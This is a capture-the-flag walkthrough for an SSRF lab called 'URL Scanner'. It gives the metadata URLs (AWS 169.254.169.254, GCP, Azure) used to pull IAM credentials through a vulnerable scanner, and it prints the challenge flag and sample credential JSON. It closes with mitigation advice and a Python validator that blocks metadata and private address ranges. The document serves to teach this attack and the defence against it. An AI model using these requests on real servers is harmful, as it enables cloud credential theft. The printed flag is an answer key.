
  • Daily Challenge
  • Released 06 Aug 2025

URL Scanner - Complete SSRF to AWS Metadata Solution

Understanding SSRF and AWS Metadata

Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.

Step 1: Initial Reconnaissance

  1. Access the URL scanner: Navigate to http://<target-ip> to access the SecureScan Pro service (hosted on port 80)
  2. Test normal functionality: Try scanning a legitimate external URL like https://example.com
  3. Observe the response: Note the detailed information returned (headers, status, content preview)
  4. Analyze the request pattern: Understand how the service processes and displays URL content
Normal Request Example:
URL: https://example.com
Response: Shows headers, status code, content preview, server information
Deployment Architecture: The challenge runs on port 80 via nginx proxy, with the Flask app internally on port 8080 and the AWS metadata simulator on port 8081

Step 2: Testing for SSRF - AWS Metadata Discovery

Test AWS Metadata Endpoints

  1. Test AWS metadata access: Try scanning the well-known AWS metadata endpoints
Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/

Step 3: Exploring AWS Metadata Structure

  1. Access metadata root: Start with the basic metadata endpoint
URL: http://169.254.169.254/latest/meta-data/
  2. Explore available endpoints: You'll see a list like:
     ami-id
     hostname
     instance-id
     instance-type
     local-hostname
     local-ipv4
     public-hostname
     public-ipv4
     security-groups
     iam/
  3. Focus on IAM endpoints: The most sensitive data is usually in IAM credentials
Key Insight: AWS metadata often contains sensitive IAM credentials that can be used for privilege escalation and lateral movement in cloud environments.

Step 4: Extracting IAM Credentials and Flag

  1. Access IAM security credentials: Navigate through the IAM endpoints in this order:
     http://169.254.169.254/latest/meta-data/iam/
     http://169.254.169.254/latest/meta-data/iam/security-credentials/
     http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
  2. Extract the credentials: The final endpoint contains the flag embedded in the JSON response
  3. Flag location: Look for the 'Challenge_Flag' field in the IAM credentials JSON
  4. Flag format: UUID format (117c287d-efb6-4e42-9292-51e180367855)
Expected JSON Response:
{
  "Code" : "Success",
  "LastUpdated" : "2025-08-06T12:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "AKIA...",
  "SecretAccessKey" : "wJalrXUtnFEMI...",
  "Token" : "AQoDYXdzEJr...",
  "Expiration" : "2025-08-06T18:00:00Z",
  "Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
  "Note" : "SSRF Challenge Completed!"
}
Flag: 117c287d-efb6-4e42-9292-51e180367855

Step 5: Alternative Attack Methods

Method 1: Direct Path Access

http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole

Method 2: Explore Other Metadata

http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groups

Method 3: Real-World Cloud Metadata Endpoints

http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)

Understanding AWS Metadata Exposure

  • IAM credential theft: AWS metadata exposes temporary security credentials for the instance role
  • Instance information: Detailed system information about the EC2 instance
  • User data exposure: Startup scripts and configuration data
  • Security group info: Network security configuration details
  • Cross-service access: Credentials can be used to access other AWS services
  • Privilege escalation: Stolen IAM credentials may have broader permissions than expected

Real-World SSRF to AWS Metadata Impact

  • Complete AWS account compromise: IAM credentials can access S3, RDS, Lambda, and other services
  • Data exfiltration: Access to private S3 buckets and databases
  • Infrastructure manipulation: Creating/deleting resources, modifying security groups
  • Lateral movement: Using credentials to access other EC2 instances or services
  • Cost manipulation: Launching expensive resources or crypto mining instances
  • Compliance violations: Access to sensitive data without authorization

Prevention and Mitigation

  • Block metadata endpoints: Explicitly block access to 169.254.169.254 in applications
  • Use IMDSv2: Configure instances to require token-based metadata requests
  • Principle of least privilege: Minimize IAM role permissions on EC2 instances
  • Network segmentation: Isolate applications from sensitive internal services
  • Input validation: Whitelist allowed domains and IP ranges
  • WAF rules: Block requests to internal IP ranges and metadata endpoints
  • Monitoring: Alert on unusual metadata service access patterns
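One way to implement the "Block metadata endpoints" and "Input validation" items above in a URL scanner like this lab's Flask service (an added example, not the challenge's own code): the check resolves the host, tests every answer against link-local and private ranges, and hands back the vetted addresses so the fetch cannot be redirected after the check. The hostnames "metadata" and "instance-data", and the injectable `resolver` parameter, are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
# Ranges an outbound scanner must never reach; 169.254.0.0/16 covers the
# AWS/Azure metadata address 169.254.169.254 used throughout this lab.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",                                  # link-local (IMDS)
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "0.0.0.0/8", "100.64.0.0/10",       # loopback, "this", CGNAT
    "::1/128", "fe80::/10", "fc00::/7",                # IPv6 loopback, link-local, ULA
)]
# GCP's metadata.google.internal is on the page; the others are assumed aliases.
METADATA_HOSTNAMES = {"metadata.google.internal", "metadata", "instance-data"}

def is_blocked_address(ip_text: str) -> bool:
    """True if a literal IP falls inside a blocked range (IPv4-mapped IPv6 too)."""
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:169.254.169.254 -> 169.254.169.254
    return any(ip in net for net in BLOCKED_NETWORKS)

def resolve_all(host: str) -> list[str]:
    """Default resolver: every A/AAAA answer for the host, not just the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def validate_scan_target(url: str, resolver=resolve_all) -> tuple[bool, str]:
    """Return (allowed, detail). When allowed, detail lists the vetted IPs; the
    scanner should connect to one of them rather than re-resolving the name."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTNAMES:
        return False, f"metadata hostname: {host}"
    try:
        ipaddress.ip_address(host)       # literal address: check it directly
        addresses = [host]
    except ValueError:                   # hostname: check every resolved address
        try:
            addresses = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    blocked = [a for a in addresses if is_blocked_address(a)]
    if blocked:
        return False, f"blocked address: {blocked[0]}"
    return True, ",".join(addresses)
```

Pair this with IMDSv2 on the instance itself: the application-side check stops the scanner reaching 169.254.169.254, while the token requirement limits what a bypass could read.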

Technical Analysis of This Challenge

  • Vulnerability type: Server-Side Request Forgery (SSRF) targeting AWS metadata simulation
  • Root cause: No URL validation or filtering in the scanning service
  • Attack method: Direct request to simulated AWS metadata endpoints
  • Target service: AWS metadata service at 169.254.169.254 (intercepted and simulated)
  • Flag location: Embedded in IAM security credentials JSON response
  • Educational value: Demonstrates real-world cloud security attack vectors

Challenge Summary

This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.